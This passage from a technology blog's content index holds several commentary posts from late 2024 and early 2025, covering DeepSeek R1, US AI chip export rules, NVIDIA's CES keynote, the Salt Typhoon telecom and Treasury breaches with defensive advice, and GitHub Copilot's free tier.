broadly strong across categories.\nBut what\u0026rsquo;s technically fascinating is the training approach. The technical paper describes a process that starts with pure reinforcement learning on a base model, without supervised fine-tuning first. This \u0026ldquo;cold start\u0026rdquo; RL approach led to emergent reasoning behaviors — the model learned to decompose problems, verify intermediate steps, and re-examine its assumptions, all from the reward signal alone. They then used this RL-trained model to generate synthetic data for a more polished final version.\nThe paper is refreshingly detailed. While OpenAI\u0026rsquo;s o1 system card was notably sparse on technical details, DeepSeek provides enough information to understand and potentially reproduce their approach. This transparency is valuable for the research community regardless of what you think about the geopolitics.\nThe Cost Question # Perhaps the most provocative aspect of DeepSeek\u0026rsquo;s work is the claimed training cost. While exact figures aren\u0026rsquo;t published in the paper, estimates based on their described compute setup suggest R1 was trained for roughly $5-6 million — a fraction of the hundreds of millions that frontier labs in the US reportedly spend on their latest models.\nThere are important caveats here. DeepSeek builds on their existing V3 base model, so the total investment is higher than just the R1 training run. They may benefit from lower labor costs. And comparing training costs across organizations is notoriously difficult because of different accounting practices and infrastructure setups.\nStill, even accounting for these factors, the efficiency is remarkable. DeepSeek reportedly used around 2,000 NVIDIA H800 GPUs (the China-export-compliant variant of the H100) for their training runs. If they\u0026rsquo;re achieving frontier-competitive results with this setup, it challenges the narrative that you need 100,000+ H100 clusters and billions in investment to build competitive AI models.\nThis has implications for the entire AI industry. If the scaling laws are less about brute-force compute and more about clever training approaches, the moat around well-funded US labs is narrower than many assumed. And for smaller companies and research labs, it means competitive AI development might be more accessible than the current \u0026ldquo;compute is everything\u0026rdquo; narrative suggests.\nThe Open-Source Impact # R1 is released under the MIT license — the most permissive common open-source license. You can use it commercially, modify it, distribute it, and build products on top of it without restrictions. DeepSeek also released six distilled versions, ranging from 1.5B to 70B parameters, built by distilling R1\u0026rsquo;s reasoning capabilities into smaller Qwen and Llama-based models.\nThe distilled models are particularly useful. The 32B distilled version performs remarkably well relative to its size — it outperforms o1-mini on several benchmarks while being small enough to run on consumer hardware or a single cloud GPU. For developers who want reasoning capabilities in their applications without the cost of running a 671B parameter model, these distilled versions are immediately practical.\nThis release enriches the open-source AI ecosystem significantly. We now have open reasoning models that are genuinely competitive with the best proprietary offerings. Combined with other open foundation models and their evolving capabilities, the open-source AI stack is reaching a point where you can build sophisticated AI applications entirely on open models.\nThe Geopolitical Dimension # I\u0026rsquo;d be remiss not to acknowledge the elephant in the room. DeepSeek is a Chinese company. Last week I wrote about the Biden administration\u0026rsquo;s AI Diffusion Rule, which aims to control China\u0026rsquo;s access to advanced AI chips. And here\u0026rsquo;s a Chinese lab producing frontier-competitive models using export-restricted hardware variants.\nThis creates an uncomfortable tension in the US policy narrative. If Chinese labs can match US model capabilities despite chip restrictions, the strategic value of those restrictions becomes less clear. The counterargument is that restrictions slow progress and prevent access to the very best hardware, which may matter at the true frontier. But R1 suggests the gap, if it exists, is narrower than many policymakers assumed.\nFor developers and engineers, the geopolitics is mostly noise. What matters is whether the model is good, whether you can use it, and whether it\u0026rsquo;s safe and reliable for your use case. As AI regulation like the EU AI Act develops, understanding the governance landscape for open-source models becomes increasingly important. On those practical dimensions, R1 delivers.\nMy Take # I\u0026rsquo;ve been building software for three decades, and I\u0026rsquo;ve learned to be skeptical of \u0026ldquo;X killer\u0026rdquo; claims. But DeepSeek R1 is genuinely significant. Not because it \u0026ldquo;kills\u0026rdquo; o1 — both are excellent models with different trade-offs — but because it demonstrates that the frontier of AI isn\u0026rsquo;t a walled garden.\nThe fact that a fully open-source model can compete with the best proprietary reasoning models fundamentally changes the conversation about AI strategy. If you\u0026rsquo;re an enterprise evaluating AI vendors, you now have a credible open-source reasoning option. If you\u0026rsquo;re a startup, you can build on R1 without API costs or vendor lock-in. If you\u0026rsquo;re a researcher, you can study and improve upon a frontier reasoning model instead of just probing it through an API.\nWe\u0026rsquo;re still early in understanding what R1 means for the industry. But sitting here today, testing a locally-running reasoning model that rivals the best in the world, available under an MIT license — this feels like one of those moments that shifts the landscape. The open-source AI movement just got a very powerful new data point in its favor.\n","date":"23 January 2025","externalUrl":null,"permalink":"/posts/250123-deepseek-r1-open-source-reasoning/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"DeepSeek’s R1 reasoning model, released as fully open-source with an MIT license, demonstrates that frontier AI capabilities aren’t exclusive to US labs anymore.","title":"DeepSeek R1 — Open-Source Reasoning Models Change the Game","type":"posts"},{"content":"With just days left in the Biden administration, the Commerce Department has published its most ambitious AI-related regulation yet: the AI Diffusion Rule, a sweeping framework that creates a three-tier system governing the export of advanced AI chips and model weights. Whether you\u0026rsquo;re building AI systems, deploying them internationally, or simply relying on cloud infrastructure, this rule will ripple through the industry for years.\nThe rule, which was published on January 15 and is set to take effect in 120 days, moves beyond the existing entity-specific export controls on China and creates a global framework. It\u0026rsquo;s arguably the most significant piece of technology policy to come out of this administration, and it arrives at a moment when the incoming Trump administration\u0026rsquo;s approach to AI regulation remains uncertain.\nThe Three-Tier Framework # The rule divides the world into three tiers for purposes of advanced AI chip exports:\nTier 1 consists of 18 close allies and partners — including the EU, UK, Japan, South Korea, Australia, and others. These countries face essentially no restrictions. Companies headquartered in Tier 1 nations can purchase and deploy advanced GPUs (think NVIDIA H100s, A100s, and future generations) without meaningful limitations.\nTier 2 covers most of the rest of the world — roughly 120 countries. Companies in these countries can import a limited number of advanced AI chips (up to about 50,000 GPUs per company) without a license. Beyond that threshold, they need to establish \u0026ldquo;Universal Verified End Use\u0026rdquo; (UVEU) agreements with the US government, essentially promising the chips won\u0026rsquo;t be diverted.\nTier 3 is the restricted group: China, Russia, Iran, North Korea, and a handful of others. These countries remain under the tightest restrictions, with effectively no access to the most advanced AI chips.\nThe framework also introduces controls on closed-weight AI model exports. Models exceeding certain compute thresholds during training would require licenses for deployment in Tier 2 and Tier 3 countries. Open-weight models are explicitly exempted, which is a notable win for the open-source AI community.\nWhy This Matters for Developers # If you\u0026rsquo;re a developer or architect working on AI deployments, the practical implications depend entirely on where you and your users are located. These controls intersect with global AI governance frameworks like the EU AI Act, creating a complex regulatory landscape for deployment and compliance decisions.\nFor those of us in Europe, the impact is minimal — the Netherlands, along with the rest of the EU, sits comfortably in Tier 1. We can continue procuring and deploying whatever compute we need. But if you\u0026rsquo;re building services for international customers, particularly in Southeast Asia, the Middle East, Africa, or Latin America, you now need to think about the compute geography of your deployments.\nThe 50,000 GPU cap for Tier 2 countries is meaningful. That sounds like a lot, but for major cloud providers trying to build data center capacity in places like India, Brazil, or the UAE, it\u0026rsquo;s actually quite limiting. A single large training cluster can use 10,000 to 30,000 GPUs. This rule effectively constrains the build-out of AI compute capacity in Tier 2 nations unless those countries negotiate UVEU frameworks with the US.\nThe cloud implications are interesting too. The rule includes provisions for \u0026ldquo;headquarter-based\u0026rdquo; exemptions — if a Tier 1 company (say, Microsoft or Google) operates data centers in Tier 2 countries, they can receive higher allocations, but with conditions around security and access controls. This could give the US hyperscalers a structural advantage over local cloud providers in Tier 2 markets.\nThe Geopolitical Chess Game # Let\u0026rsquo;s be honest about what\u0026rsquo;s really going on. This rule is primarily about China. The original chip export controls in October 2022 were targeted but leaky — Chinese companies found workarounds through third countries and slightly modified chip designs. The AI Diffusion Rule is an attempt to plug those gaps by controlling the entire global distribution, not just the China-facing exports.\nThe strategy is clear: rather than playing whack-a-mole with specific entities and chip models, create a comprehensive framework that controls the global flow of AI compute. It\u0026rsquo;s a recognition that in a world where AI chips are the new strategic resource, you need something more like an oil export regime than traditional tech export controls.\nNVIDIA has already pushed back, arguing the rule could drive customers to foreign competitors and fragment the global tech ecosystem. Their concern isn\u0026rsquo;t unfounded — Huawei\u0026rsquo;s Ascend AI chips, while less capable than NVIDIA\u0026rsquo;s best, are being deployed at scale within China. If Tier 2 countries find US-made chips too difficult to procure, they might look to alternatives.\nThe Open-Source Exemption # One detail that\u0026rsquo;s getting less attention than it deserves: the rule explicitly exempts open-weight model exports from the licensing requirements. This means models like Meta\u0026rsquo;s Llama, Mistral\u0026rsquo;s offerings, and other openly released models can be deployed anywhere in the world without additional export controls.\nThis is significant policy. It suggests the administration recognizes a distinction between compute infrastructure (which is physically constrained and controllable at borders) and model weights (which are essentially information and practically impossible to control once released). By exempting open-source models, the rule avoids the absurdity of trying to control the distribution of files that are already freely available on the internet.\nFor the open-source AI community, this is a meaningful victory. Models like DeepSeek R1 demonstrate what\u0026rsquo;s possible with open-source reasoning models released globally. It preserves the ability to share AI research and models globally, even as the underlying compute infrastructure becomes more controlled.\nMy Take # I have mixed feelings about this rule. On one hand, I understand the national security logic. Advanced AI capabilities are genuinely dual-use, and there are legitimate reasons to want to control which governments have access to the most powerful AI systems. The three-tier approach is more nuanced than a blanket ban.\nOn the other hand, as someone who\u0026rsquo;s spent decades in an industry built on global collaboration and open standards, I\u0026rsquo;m uncomfortable with the trajectory. The internet was designed to be borderless. Open source thrived because code could flow freely. Introducing export controls on compute and model weights — even well-intentioned ones — starts to balkanize the global technology ecosystem.\nThe practical question is whether the incoming Trump administration will keep, modify, or scrap this rule. The 120-day implementation timeline means it won\u0026rsquo;t take full effect until mid-May, giving the new administration ample time to intervene. Given the political dynamics around both China hawkishness and tech industry lobbying, the outcome is genuinely hard to predict.\nWhat\u0026rsquo;s clear is that AI governance is no longer a theoretical discussion. It\u0026rsquo;s becoming trade policy, export control, and geopolitics. For those of us who just want to build useful software, the complexity of the operating environment just increased significantly.\n","date":"16 January 2025","externalUrl":null,"permalink":"/posts/250116-biden-ai-diffusion-rule/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Biden administration’s new AI Diffusion Rule creates a three-tier system for GPU exports, reshaping the global AI compute landscape.","title":"Biden's AI Diffusion Rule — Chip Export Controls Get Real","type":"posts"},{"content":"CES has long been a consumer electronics show at heart — a place for TVs, gadgets, and concept cars. But Jensen Huang\u0026rsquo;s two-hour keynote this week made it clear that NVIDIA has essentially turned CES into an AI infrastructure conference. The announcements were dense, ambitious, and consequential for anyone building or deploying AI systems.\nThe headline consumer product — the GeForce RTX 5090 and 5070 series based on the new Blackwell architecture — is impressive on its own. But what caught my attention were three announcements that matter more for the broader technology landscape: Project DIGITS, the Cosmos foundation models, and NVIDIA\u0026rsquo;s deepening push into physical AI and robotics.\nProject DIGITS: A Personal AI Supercomputer # The most surprising announcement, at least to me, was Project DIGITS — a desktop-sized device powered by the new GB10 Grace Blackwell Superchip that can run 200-billion-parameter AI models locally. It runs NVIDIA\u0026rsquo;s DGX OS (Linux-based), has 128GB of unified memory, up to 4TB of NVMe storage, and delivers a petaflop of AI computing performance. Two units can be linked for even larger models. Price: $3,000, shipping in May.\nLet me put this in perspective. When I first started working with neural networks in the late \u0026rsquo;90s, training even modest models required access to university computing clusters. Five years ago, running a large language model required cloud GPU instances costing thousands per month. Now NVIDIA is putting a petaflop of AI compute on your desk for the price of a high-end laptop.\nThis matters enormously for AI development workflows. Running inference and fine-tuning locally means faster iteration, no cloud costs, and no data leaving your premises. For startups, researchers, and independent developers, DIGITS could democratize access to the kind of AI experimentation that\u0026rsquo;s currently gatekept by cloud GPU availability and pricing.\nThe 200B parameter capacity is the sweet spot too — it covers running Meta\u0026rsquo;s Llama models, Mistral\u0026rsquo;s offerings, and many other open-weight models at full precision. You could realistically run a competitive AI application entirely on local hardware.\nCosmos: Foundation Models for Physical AI # NVIDIA also announced Cosmos, a platform of world foundation models designed for physical AI development — robotics, autonomous vehicles, and industrial automation. These are generative models that understand physics and can generate synthetic environments for training robots and autonomous systems.\nThis is NVIDIA playing the long game. The current AI boom is primarily about language and image generation. But the next wave — the one NVIDIA is positioning for — is about AI that interacts with the physical world. Training a robot to navigate a warehouse or a vehicle to handle edge cases requires massive amounts of scenario data. Generating that synthetically is orders of magnitude cheaper and faster than collecting it in the real world.\nThe Cosmos models are being released as open-source under the NVIDIA Open Model License, which is a smart community-building move. By providing foundational world models freely, NVIDIA ensures that the entire physical AI ecosystem develops on their platform and hardware. The models are free; the GPUs to run them are not.\nThe Blackwell Architecture in Consumer GPUs # The Blackwell architecture is NVIDIA\u0026rsquo;s core compute platform for the next generation of AI infrastructure. The RTX 5090 brings this architecture — previously reserved for data center GPUs — to consumer hardware. The standout feature is the fifth-generation Tensor Cores and a new neural rendering pipeline that NVIDIA calls \u0026ldquo;the biggest generational leap\u0026rdquo; in their history.\nThe interesting technical story here is how NVIDIA is using AI to make traditional computing faster. Their new DLSS 4 with Multi Frame Generation can generate up to three frames for every traditionally rendered frame, using AI models that run on the Tensor Cores. The GPU is essentially doing less traditional rasterization and more AI inference to produce the final image.\nThis approach — using AI acceleration to improve performance in non-AI workloads — is going to spread well beyond gaming. We\u0026rsquo;re already seeing it in video encoding, image processing, and audio. The pattern of \u0026ldquo;compute the answer approximately with traditional methods, then use AI to refine it\u0026rdquo; is becoming a general-purpose optimization strategy.\nThe Infrastructure Play # Zooming out, what struck me most about the keynote was how thoroughly NVIDIA has positioned itself across every layer of the AI stack. They make the chips (Grace, Blackwell). They make the systems (DGX, HGX, DIGITS). They provide the software platform (CUDA, cuDNN, TensorRT, Triton). They\u0026rsquo;re building foundation models (Cosmos). They have the networking (Spectrum-X, NVLink). And they have the cloud partnerships (every major cloud provider).\nThis vertical integration is reminiscent of what made IBM dominant in enterprise computing for decades. The difference is that NVIDIA doesn\u0026rsquo;t lock you in the same way — CUDA notwithstanding — because the underlying models and many tools are open source. But the practical effect is similar: if you\u0026rsquo;re building AI infrastructure to run foundation models at scale, you\u0026rsquo;re almost certainly building on NVIDIA\u0026rsquo;s stack.\nThe competition isn\u0026rsquo;t standing still. AMD\u0026rsquo;s MI300X is gaining traction in data centers. Intel\u0026rsquo;s Gaudi accelerators are finding niches. Google\u0026rsquo;s custom TPU investments and Amazon\u0026rsquo;s Trainium offerings represent real alternatives in the market. But at CES, NVIDIA demonstrated why they remain the gravitational center of AI computing: they\u0026rsquo;re not just selling chips, they\u0026rsquo;re selling an ecosystem.\nMy Take # I\u0026rsquo;ve attended CES presentations that felt like tech demos looking for a problem. This wasn\u0026rsquo;t one of those. Every announcement connected to a clear market need: cheaper local AI inference (DIGITS), better training data for robotics (Cosmos), and continued gaming dominance (RTX 50 series).\nThe DIGITS device is what I\u0026rsquo;m most excited about personally. At $3,000, it\u0026rsquo;s within reach for serious independent developers and small teams. If it delivers on the promise of running 200B parameter models locally with reasonable performance, it could shift a meaningful chunk of AI development away from cloud providers and back to local hardware. That has implications for privacy, cost, and the pace of experimentation.\nJensen\u0026rsquo;s keynote ran over two hours and could have run four. The density of announcements reflects a company that\u0026rsquo;s firing on all cylinders. Whether you\u0026rsquo;re building AI applications, deploying infrastructure, or just trying to understand where the industry is headed, NVIDIA\u0026rsquo;s CES showing is required viewing.\n","date":"9 January 2025","externalUrl":null,"permalink":"/posts/250109-nvidia-ces-2025-ai-infrastructure/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"NVIDIA’s CES 2025 keynote unveiled the RTX 5090, Project DIGITS personal AI supercomputer, and Cosmos foundation models — cementing their grip on AI infrastructure.","title":"NVIDIA at CES 2025 — Jensen's Vision for AI Infrastructure","type":"posts"},{"content":"We\u0026rsquo;re barely into 2025 and the cybersecurity landscape is already demanding attention. In late December, the US Treasury Department confirmed it was breached by Chinese state-sponsored hackers through a compromised third-party service provider — BeyondTrust, a company specializing in, of all things, privileged access management. The irony isn\u0026rsquo;t lost on anyone in the security community.\nThis breach is part of the larger Salt Typhoon campaign that\u0026rsquo;s been making headlines since the fall. What started as reports of telecom infiltrations — with AT\u0026amp;T, Verizon, and T-Mobile among the targets — has now expanded to include federal agencies. The scope of this campaign is staggering, and it\u0026rsquo;s the kind of story that should make every engineer rethink their assumptions about supply chain security.\nWhat Happened at Treasury # The attack vector is particularly instructive. BeyondTrust, which provides remote support and privileged access solutions to government agencies, discovered that attackers had obtained a key used to secure their cloud-based remote technical support service. With that key, the attackers could override security controls and remotely access Treasury Department workstations and unclassified documents.\nLet that sink in: a single compromised API key at a third-party vendor gave nation-state attackers access to federal government workstations. This isn\u0026rsquo;t a sophisticated zero-day exploit chain. It\u0026rsquo;s a supply chain compromise that leveraged trust relationships — the exact kind of attack that\u0026rsquo;s been the industry\u0026rsquo;s blind spot for years.\nThe Treasury Department has said the compromised service has been taken offline and there\u0026rsquo;s no evidence the attackers still have access. But the damage assessment is ongoing, and unclassified doesn\u0026rsquo;t mean unimportant — Treasury handles sensitive economic data, sanctions information, and financial intelligence.\nThe Supply Chain Problem Won\u0026rsquo;t Go Away # If this feels like déjà vu, it should. The pattern of sophisticated supply chain attacks is consistent: rather than attacking hardened primary targets directly, adversaries compromise trusted vendors and ride those trust relationships into their actual targets. These attacks reflect a broader shift in how critical infrastructure is being targeted by sophisticated threat actors.\nWhat makes this particularly challenging is that organizations are being told to adopt zero-trust architectures while simultaneously being forced to extend trust to dozens of SaaS providers, managed service providers, and cloud vendors. The Treasury Department presumably followed federal security guidelines. They presumably vetted BeyondTrust. And yet here we are.\nFor those of us building and deploying software, this raises uncomfortable questions. How many third-party services have API keys or tokens that could provide similar access to our infrastructure? How would we even detect if one of those keys was compromised? Most organizations I\u0026rsquo;ve worked with have at best a partial inventory of their third-party integrations and the access levels those integrations have been granted.\nThe Telecom Dimension # The broader Salt Typhoon campaign targeting telecommunications providers is arguably even more concerning. Reports suggest the attackers accessed call records, communications of specific targets (including individuals involved in government and political activities), and systems used for court-authorized wiretapping.\nThe telecom breaches highlight a fundamental tension in security policy. Governments mandate that telecom providers build lawful intercept capabilities — backdoors, essentially — and then act surprised when sophisticated adversaries find and exploit those same capabilities. The CALEA (Communications Assistance for Law Enforcement Act) infrastructure that enables wiretapping also creates a target for foreign intelligence services.\nThis is something I\u0026rsquo;ve argued about for years in various contexts: you cannot build a backdoor that only the \u0026ldquo;good guys\u0026rdquo; can use. Any deliberate weakness in a system is a weakness, period. The Salt Typhoon campaign is providing a very expensive real-world demonstration of this principle.\nWhat Engineering Teams Should Do # While most of us aren\u0026rsquo;t defending against nation-state actors directly, the lessons from Salt Typhoon apply broadly:\nAudit third-party access. Map every external service that has credentials, API keys, or tokens providing access to your infrastructure. Understand what level of access each one has. Apply least privilege ruthlessly — if a monitoring service only needs read access to metrics, it shouldn\u0026rsquo;t have write access to anything.\nRotate credentials proactively. Don\u0026rsquo;t wait for a breach disclosure. Implement regular rotation of API keys and service account credentials. If a vendor can\u0026rsquo;t support credential rotation, that\u0026rsquo;s a red flag worth discussing.\nMonitor for anomalous access patterns. The Treasury breach was initially detected by BeyondTrust itself. But organizations should have their own detection capabilities for unusual access patterns from third-party services — access at odd hours, from unexpected IP ranges, or to resources that aren\u0026rsquo;t typically accessed through that integration.\nEvaluate vendor security posture. Ask your critical vendors about their own security practices. SOC 2 reports are a start, but they\u0026rsquo;re backward-looking. Ask about their incident response times, their own supply chain security practices like SLSA, and how they\u0026rsquo;d notify you of a compromise.\nMy Take # I\u0026rsquo;ve been in this industry long enough to remember when \u0026ldquo;perimeter security\u0026rdquo; was considered sufficient. We moved to defense-in-depth, then to zero trust, and yet we keep getting caught by the same fundamental problem: we have to trust something, and attackers are very good at finding and exploiting those trust relationships.\nThe Salt Typhoon campaign isn\u0026rsquo;t just a government problem or a telecom problem. It\u0026rsquo;s a preview of the threat landscape for 2025. Nation-state groups are patient, well-resourced, and increasingly targeting the connective tissue between organizations rather than the organizations themselves, exploiting the same trust relationships that our systems depend on.\nIf there\u0026rsquo;s one New Year\u0026rsquo;s resolution worth making for your engineering team, it\u0026rsquo;s this: spend a day mapping your third-party trust relationships and honestly assessing how a compromise at any one of them would affect your systems. The answer will probably keep you up at night — but that\u0026rsquo;s better than finding out the hard way.\n","date":"2 January 2025","externalUrl":null,"permalink":"/posts/250102-salt-typhoon-treasury-breach/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Chinese state-sponsored Salt Typhoon campaign breached the US Treasury Department, exposing how even the most security-conscious organizations remain vulnerable.","title":"Salt Typhoon and the Treasury Breach — State-Sponsored Hacking Hits Home","type":"posts"},{"content":"Just before the holidays, GitHub dropped what might be the most consequential developer tooling announcement of the year: Copilot is now free for everyone. Not a trial. Not a limited preview. A genuine free tier with 2,000 code completions and 50 chat messages per month in VS Code. For a tool that\u0026rsquo;s been at the center of the AI-assisted development conversation since 2021, this is a big deal.\nI\u0026rsquo;ve been using Copilot since the technical preview, and I\u0026rsquo;ve watched it evolve from a curious autocomplete experiment into something that genuinely changes how I write code day-to-day. The competition from AI-powered development tools powered by foundation models has accelerated this shift. Making it free isn\u0026rsquo;t just a pricing decision — it\u0026rsquo;s GitHub betting that AI assistance will become as fundamental to development as syntax highlighting.\nThe Strategic Play # Let\u0026rsquo;s be clear about what\u0026rsquo;s happening here. GitHub (and by extension Microsoft) isn\u0026rsquo;t doing this out of generosity. The AI coding assistant space has gotten crowded. Cursor and other AI-native IDEs have been gaining traction with their focus on deep AI integration. Codeium offers a competitive free tier. Amazon\u0026rsquo;s CodeWhisperer has been free for individual use since launch. JetBrains announced their own AI assistant. The market pressure is real.\nBy offering a free tier, GitHub is leveraging its most powerful asset: distribution. Over 100 million developers already have GitHub accounts. Most of them use VS Code. The friction to try Copilot just dropped to zero. That\u0026rsquo;s a moat that\u0026rsquo;s very hard for competitors to cross. As Copilot evolves into more agentic capabilities, the free tier strategy becomes even more critical for adoption.\nThe 2,000 completions per month limit is thoughtfully set. It\u0026rsquo;s enough for a hobbyist or student to get genuine value, but professional developers writing code eight hours a day will likely hit it and want to upgrade. It\u0026rsquo;s the classic freemium play, executed with the advantage of owning both the code hosting platform and the most popular editor.\nWhat the Free Tier Actually Includes # The free offering isn\u0026rsquo;t a stripped-down version. You get GPT-4o-powered completions and chat, access to Claude 3.5 Sonnet as an alternative model, and it works across VS Code and on github.com. Multi-file editing is included. The chat can reference your workspace context.\nWhat you don\u0026rsquo;t get: Copilot in your IDE of choice if it\u0026rsquo;s not VS Code (JetBrains, Neovim, and others require a paid plan), and you\u0026rsquo;re limited in the number of interactions. Enterprise features like organization-wide policy controls, IP indemnity, and audit logs are obviously not included.\nFor someone mentoring junior developers or teaching, this is excellent. I can now tell every student and every new team member to just enable Copilot without worrying about budget approval or trial expirations. That alone changes the onboarding conversation.\nThe Broader Implications for Developer Tools # This move accelerates something I\u0026rsquo;ve been thinking about for a while: AI assistance is becoming table stakes for code editors. Just as we went from plain text editors to syntax-highlighted IDEs to intelligent code completion with IntelliSense, AI-powered suggestions are becoming the next expected layer.\nThe question is no longer \u0026ldquo;should I use an AI coding assistant?\u0026rdquo; but rather \u0026ldquo;which one integrates best with my workflow?\u0026rdquo; And by making Copilot free, GitHub is ensuring that for most developers, the answer defaults to their product.\nI think this also pressures the rest of the ecosystem in healthy ways. JetBrains will need to respond. The Cursor team, which has been doing genuinely innovative work with their editor, will need to differentiate even harder on capabilities rather than price. Open-source alternatives like Continue and Tabby will find their niche with developers who want local models and full control over their data.\nMy Take # I\u0026rsquo;ve been paying for Copilot since it went GA, and I\u0026rsquo;ll continue with the paid plan for the unlimited completions and JetBrains support. But I\u0026rsquo;m genuinely excited about the free tier — not for myself, but for the ecosystem effects.\nWhen I started programming in the early \u0026rsquo;90s, getting access to a decent compiler was itself a barrier. Over the decades, I\u0026rsquo;ve watched tooling become democratized — free IDEs, open-source frameworks, cloud-based development environments. Each wave lowered the barrier to entry and expanded who could participate in building software.\nFree AI-assisted coding is the next step in that progression. A developer in Lagos or Bangalore or São Paulo, working on a five-year-old laptop with a free VS Code installation, now has access to the same AI coding assistant as someone at a well-funded Silicon Valley startup. That matters.\nThe holiday timing means most teams won\u0026rsquo;t feel the impact until January, when developers return and start exploring. I expect we\u0026rsquo;ll see a significant spike in Copilot adoption numbers in Q1. And as more developers build muscle memory with AI-assisted workflows, the entire conversation about how we write software shifts again.\nNot a bad way to close out 2024.\n","date":"26 December 2024","externalUrl":null,"permalink":"/posts/241226-github-copilot-free-tier/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub’s decision to offer a free tier for Copilot signals a fundamental shift in how AI-assisted coding will reach developers everywhere.","title":"GitHub Copilot Goes Free — What This Means for Every Developer","type":"posts"},{"content":"If you\u0026rsquo;ve been following the news this month, you\u0026rsquo;ve seen the Salt Typhoon story escalate from a concerning report to what US officials are now calling one of the worst telecommunications hacks in American history. Chinese state-sponsored hackers have infiltrated at least eight major US telecom providers — including AT\u0026amp;T, Verizon, T-Mobile, and Lumen Technologies — and the full scope of the breach is still being uncovered. As someone who has spent decades building and securing systems, this one genuinely unsettles me.\nWhat Happened # Salt Typhoon (a name assigned by Microsoft\u0026rsquo;s threat intelligence team) is a Chinese state-affiliated cyber espionage group that has been systematically compromising telecommunications infrastructure. The campaign reportedly began as early as 2022 but wasn\u0026rsquo;t publicly disclosed until October 2024, when reports emerged that the group had accessed systems used for court-authorized wiretapping.\nThe implications are staggering. The attackers gained access to call metadata — who called whom, when, and for how long — for a vast number of Americans. In some cases, they accessed actual call content and text messages, particularly targeting individuals involved in government and political activities. This Salt Typhoon campaign connects to broader government breaches and demonstrates the severity of critical infrastructure attacks that reflect the ongoing zero-day treadmill.\nWhat makes this particularly alarming is the access to lawful intercept systems. These are the systems that telecom providers maintain to comply with court-ordered surveillance — essentially backdoors built into telecommunications infrastructure at the government\u0026rsquo;s request. The irony is brutal: systems designed to enable government surveillance were exploited by a foreign adversary to conduct their own surveillance. This validates concerns about government surveillance approaches and the risks of intentional backdoors.\nThe Technical Implications # For those of us building software systems, Salt Typhoon raises fundamental questions about infrastructure trust. If nation-state actors can compromise the telecommunications backbone, what does that mean for the security assumptions we build on?\nFirst, there\u0026rsquo;s the encryption question. End-to-end encrypted communications (Signal, WhatsApp\u0026rsquo;s Signal protocol, iMessage) appear to have been unaffected — the attackers could see metadata but not content for encrypted channels. This is a powerful validation of the end-to-end encryption model. CISA has taken the unusual step of explicitly recommending that Americans use encrypted messaging apps, which is a remarkable statement from a government agency that has historically been lukewarm about strong encryption.\nSecond, the compromise of lawful intercept infrastructure validates what security researchers have argued for years: you cannot build a \u0026ldquo;backdoor\u0026rdquo; that only good guys can use. The CALEA (Communications Assistance for Law Enforcement Act) infrastructure that was exploited exists because the US government mandated it. The lesson is clear — any intentional vulnerability in a system will eventually be found and exploited by adversaries.\nThird, the persistence of the attackers is notable. Reports indicate that despite months of remediation efforts, some telecoms have not been able to fully evict the attackers from their networks. This speaks to the depth of access achieved and the sophistication of the implants used. When we talk about \u0026ldquo;advanced persistent threats,\u0026rdquo; this is what the \u0026ldquo;persistent\u0026rdquo; part means.\nWhat This Means for Developers # You might think telecom infrastructure hacking is far removed from your day-to-day development work, but the lessons apply broadly.\nAssume the network is hostile. This has been a security principle for years, but Salt Typhoon makes it viscerally real. If you\u0026rsquo;re building applications that transmit sensitive data, end-to-end encryption isn\u0026rsquo;t optional — it\u0026rsquo;s essential. Don\u0026rsquo;t rely on transport-layer security alone. TLS protects data in transit, but if an attacker has access to network infrastructure, they may be able to intercept traffic at points where it\u0026rsquo;s decrypted.\nAudit your metadata exposure. Even when content is encrypted, metadata tells a story. Who communicates with whom, when, and how frequently can reveal as much as the content itself. If your application handles sensitive communications, consider what metadata you generate and how you can minimize it.\nZero-trust architecture isn\u0026rsquo;t just a buzzword. The telecom breaches succeeded in part because internal network trust was assumed. Once the attackers were inside, they could move laterally with relative ease. Building systems that verify every request, segment access, and monitor for anomalous behavior is the practical defense against this class of attack.\nSupply chain security matters. While the full details of how Salt Typhoon gained initial access are still emerging, reports suggest exploitation of vulnerabilities in network equipment from vendors like Cisco. The devices that form the backbone of your infrastructure are attack surfaces. Implementing supply chain security standards like SLSA, npm ecosystem discipline, and diligent vendor management are critical.\nThe Policy Dimension # The Salt Typhoon revelations are already shaping policy discussions. The FCC is considering new rules requiring telecoms to secure their networks against state-sponsored attacks, with potential annual certification requirements. There\u0026rsquo;s bipartisan momentum for legislation addressing telecom security, which is notable in the current political climate.\nThe broader geopolitical context matters too. This comes amid ongoing tensions between the US and China over technology — chip export controls, TikTok scrutiny, and now telecommunications espionage. For technology professionals working in multinational environments, understanding these dynamics isn\u0026rsquo;t just academic; it affects vendor selection, data residency decisions, and compliance requirements.\nMy Take # Salt Typhoon is a wake-up call, though I fear it won\u0026rsquo;t be the last one needed. The telecommunications industry has underinvested in security for decades, treating it as a cost center rather than a core requirement. The fact that lawful intercept systems were compromised is particularly damning — it demonstrates that mandated backdoors are a liability, not just for privacy advocates but for national security, reinforcing the need for stronger defensive practices across all critical infrastructure.\nFor developers and architects, the practical takeaway is to double down on end-to-end encryption, minimize metadata exposure, and design systems that assume the network cannot be trusted. These aren\u0026rsquo;t new principles, but Salt Typhoon gives them renewed urgency.\nAnd if you\u0026rsquo;re still sending sensitive information over unencrypted channels — SMS, regular phone calls, unencrypted email — now is the time to change that habit. The threat isn\u0026rsquo;t theoretical anymore.\n","date":"19 December 2024","externalUrl":null,"permalink":"/posts/241219-salt-typhoon-telecom-hack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Salt Typhoon campaign has compromised major US telecoms at a staggering scale. What developers and architects need to understand about this ongoing threat.","title":"Salt Typhoon — The Telecom Hack That Should Worry Every Engineer","type":"posts"},{"content":"Google dropped Gemini 2.0 yesterday, and the \u0026ldquo;Flash\u0026rdquo; variant is already available for developers through the Gemini API and Google AI Studio. After watching OpenAI dominate headlines with their 12 Days of announcements, Google has fired back with what appears to be a genuinely impressive next generation of their foundation model. Having followed the AI model releases closely this year, Gemini 2.0 feels like it narrows the gap considerably — and in some areas, may leapfrog the competition.\nWhat\u0026rsquo;s New in Gemini 2.0 # The headline feature is what Google calls \u0026ldquo;agentic capabilities\u0026rdquo; — the model can natively use tools like Google Search, execute code, and call third-party functions as part of its reasoning process. This isn\u0026rsquo;t 